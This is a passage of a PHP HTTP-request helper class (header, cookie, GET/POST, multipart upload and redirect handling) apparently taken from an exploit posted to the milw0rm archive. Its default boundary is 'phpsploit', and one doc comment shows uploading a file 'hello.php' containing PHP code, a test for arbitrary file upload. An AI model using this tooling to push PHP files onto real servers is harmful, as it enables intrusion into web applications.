			$this->proxyuser = substr($proxyauth,0,$posvirg);
			$this->proxypass = substr($proxyauth,$posvirg+1);
		}
		else
		{
			$this->proxyuser = $proxyauth;
			$this->proxypass = $proxypass;
		}
	}


	/**
	 * This function allows you to set
	 * the 'User-Agent' header.
	 * 
	 * @access  public
	 * @param   string useragent Agent
	 * @example $this->agent('Firefox')
	 * 
	 */
	function agent($useragent)
	{
		$this->addheader('User-Agent',$useragent);
	}

	
	/**
	 * This function returns the headers
	 * which will be in the next request.
	 * 
	 * @access  public
	 * @return  string $this->header_str Headers
	 * @example $this->showheader()
	 * 
	 */
	function showheader()
	{
		$this->header_str = '';
		
		if(!isset($this->header))
		   return;
		   
		foreach($this->header as $name => $value)
		   $this->header_str .= $name.': '.$value."\r\n";
		   
		return $this->header_str;
	}

	
	/**
	 * This function returns the cookies
	 * which will be in the next request.
	 * 
	 * @access  public
	 * @return  string $this->cookie_str Cookies
	 * @example $this->showcookie()
	 * 
	 */
	function showcookie()
	{
		$this->cookie_str = '';
		
		if(!isset($this->cookie))
		   return;
		
		foreach($this->cookie as $name => $value)
		   $this->cookie_str .= $name.'='.$value.'; ';

		return $this->cookie_str;
	}


	/**
	 * This function returns the last
	 * formed http request.
	 * 
	 * @access  public
	 * @return  string $this->packet HttpPacket
	 * @example $this->showlastrequest()
	 * 
	 */
	function showlastrequest()
	{
		if(!isset($this->packet))
		   return;
		else
		   return $this->packet;
	}


	/**
	 * This function sends the formed
	 * http packet with the GET method.
	 * 
	 * @access  public
	 * @param   string url Url
	 * @return  string $this->sock()
	 * @example $this->url('localhost/index.php?var=x')
	 * @example $this->url('http://localhost:88/tst.php')
	 * 
	 */
	function get($url)
	{
		$this->target($url);
		$this->method = 'get';
		return $this->sock();
	}

	
	/**
	 * This function sends the formed
	 * http packet with the POST method.
	 *
	 * @access  public
	 * @param   string url  Url
	 * @param   string data PostData
	 * @return  string $this->sock()
	 * @example $this->post('http://localhost/','helo=x')
	 * 
	 */	
	function post($url,$data)
	{
		$this->target($url);
		$this->method = 'post';
		$this->data = $data;
		return $this->sock();
	}
	

	/**
	 * This function sends the formed http
	 * packet with the POST method using
	 * the multipart/form-data enctype.
	 * 
	 * @access  public
	 * @param   array array FormDataArray
	 * @return  string $this->sock()
	 * @example $formdata = array(
	 *                      frmdt_url => 'http://localhost/upload.php',
	 *                      frmdt_boundary => '123456', # Optional
	 *                      'var' => 'example',
	 *                      'file' => array(
	 *                                frmdt_type => 'image/gif',  # Optional
	 *                                frmdt_transfert => 'binary' # Optional
	 *                                frmdt_filename => 'hello.php,
	 *                                frmdt_content => '<?php echo 1; ?>'));
	 *          $this->formdata($formdata);
	 * 
	 */
	function formdata($array)
	{
		$this->target($array[frmdt_url]);
		$this->method = 'formdata';
		$this->data = '';
		
		if(!isset($array[frmdt_boundary]))
		   $this->boundary = 'phpsploit';
		else
		   $this->boundary = $array[frmdt_boundary];

		foreach($array as $key => $value)
		{
			if(!preg_match('#^frmdt_(boundary|url)#',$key))
			{
				$this->data .= str_repeat('-',29).$this->boundary."\r\n";
				$this->data .= 'Content-Disposition: form-data; name="'.$key.'";';
				
				if(!is_array($value))
				{
					$this->data .= "\r\n\r\n".$value."\r\n";
				}
				else
				{
					$this->data .= ' filename="'.$array[$key][frmdt_filename]."\";\r\n";

					if(isset($array[$key][frmdt_type]))
					   $this->data .= 'Content-Type: '.$array[$key][frmdt_type]."\r\n";

					if(isset($array[$key][frmdt_transfert]))
					   $this->data .= 'Content-Transfer-Encoding: '.$array[$key][frmdt_transfert]."\r\n";

					$this->data .= "\r\n".$array[$key][frmdt_content]."\r\n";
				}
			}
		}

		$this->data .= str_repeat('-',29).$this->boundary."--\r\n";
		return $this->sock();
	}

	
	/**
	 * This function returns the content
	 * of the server response, without
	 * the headers.
	 * 
	 * @access  public
	 * @param   string code ServerResponse
	 * @return  string $this->server_content
	 * @example $this->getcontent()
	 * @example $this->getcontent($this->url('http://localhost/'))
	 * 
	 */
	function getcontent($code='')
	{
		if(empty($code))
		   $code = $this->recv;

		$code = explode("\r\n\r\n",$code);
		$this->server_content = '';
		
		for($i=1;$i<count($code);$i++)
		   $this->server_content .= $code[$i];

		return $this->server_content;
	}

	
	/**
	 * This function returns the headers
	 * of the server response, without
	 * the content.
	 * 
	 * @access  public
	 * @param   string code ServerResponse
	 * @return  string $this->server_header
	 * @example $this->getcontent()
	 * @example $this->getcontent($this->post('http://localhost/','1=2'))
	 * 
	 */
	function getheader($code='')
	{
		if(empty($code))
		   $code = $this->recv;

		$code = explode("\r\n\r\n",$code);
		$this->server_header = $code[0];
		
		return $this->server_header;
	}

	
	/**
	 * This function is called by the
	 * cookiejar() function. It adds the
	 * value of the "Set-Cookie" header
	 * in the "Cookie" header for the
	 * next request. You don't have to
	 * call it.
	 * 
	 * @access private
	 * @param  string code ServerResponse
	 * 
	 */
	function getcookie()
	{
		foreach(explode("\r\n",$this->getheader()) as $header)
		{
			if(preg_match('/set-cookie/i',$header))
			{
				$fequal = strpos($header,'=');
				$fvirgu = strpos($header,';');
				
				// 12=strlen('set-cookie: ')
				$cname  = substr($header,12,$fequal-12);
				$cvalu  = substr($header,$fequal+1,$fvirgu-(strlen($cname)+12+1));
				
				$this->cookie[trim($cname)] = trim($cvalu);
			}
		}
	}


	/**
	 * This function is called by the
	 * get()/post() functions. You
	 * don't have to call it.
	 *
	 * @access  private
	 * @param   string urltarg Url
	 * @example $this->target('http://localhost/')
	 * 
	 */
	function target($urltarg)
	{
		if(!ereg('^http://',$urltarg))
		   $urltarg = 'http://'.$urltarg;
		   
		$urlarr     = parse_url($urltarg);
		$this->url  = 'http://'.$urlarr['host'].$urlarr['path'];
		
		if(isset($urlarr['query']))
		   $this->url .= '?'.$urlarr['query'];
		
		$this->port = !empty($urlarr['port']) ? $urlarr['port'] : 80;
		$this->host = $urlarr['host'];
		
		if($this->port != '80')
		   $this->host .= ':'.$this->port;

		if(!isset($urlarr['path']) or empty($urlarr['path']))
		   die("Error: No path precised");

		$this->path = substr($urlarr['path'],0,strrpos($urlarr['path'],'/')+1);

		if($this->port > 65535)
		   die("Error: Invalid port number");
	}
	
	
	/**
	 * If you call this function,
	 * the script will extract all
	 * 'Set-Cookie' headers values
	 * and it will automatically add
	 * them into the 'Cookie' header
	 * for all next requests.
	 *
	 * @access  public
	 * @param   integer code 1(enabled) 0(disabled)
	 * @example $this->cookiejar(0)
	 * @example $this->cookiejar(1)
	 * 
	 */
	function cookiejar($code)
	{
		if($code=='0')
		   $this->cookiejar=FALSE;

		elseif($code=='1')
		   $this->cookiejar=TRUE;
	}


	/**
	 * If you call this function,
	 * the script will follow all
	 * redirections sent by the server.
	 * 
	 * @access  public
	 * @param   integer code 1(enabled) 0(disabled)
	 * @example $this->allowredirection(0)
	 * @example $this->allowredirection(1)
	 * 
	 */
	function allowredirection($code)
	{
		if($code=='0')
		   $this->allowredirection=FALSE;
		   
		elseif($code=='1')
		   $this->allowredirection=TRUE;
	}

	
	/**
	 * This function is called if
	 * allowredirection() is enabled.
	 * You don't have to call it.
	 *
	 * @access private
	 * @return string $this->url('http://'.$this->host.$this->path.$this->last_redirection)
	 * @return string $this->url($this->last_redirection)
	 * @return string $this->recv;
	 * 
	 */
	function getredirection()
	{
		if(preg_match('/(location|content-location|uri): (.*)/i',$this->getheader(),$codearr))
		{
			$this->last_redirection = trim($codearr[2]);
			
			if(!ereg('://',$this->last_redirection))
			   return $this->url('http://'.$this->host.$this->path.$this->last_redirection);

			else
			   return $this->url($this->last_redirection);
		}
		else
		   return $this->recv;
	}


	/**
	 * This function allows you
	 * to reset some parameters.
	 * 
	 * @access  public
	 * @param   string func Param
	 * @example $this->reset('header')
	 * @example $this->reset('cookie')
	 * @example $this->reset()
	 * 
	 */
	function reset($func='')
	{
		switch($func)
		{
			case 'header':
			$this->header = array();
			break;
				
			case 'cookie':
			$this->cookie = array();
			break;
				
			default:
			$this->cookiejar = '';
			$this->header = array();
			$this->cookie = array();
			$this->allowredirection = '';
			break;
		}
	}
}

?>

# milw0rm.com [2008-11-04]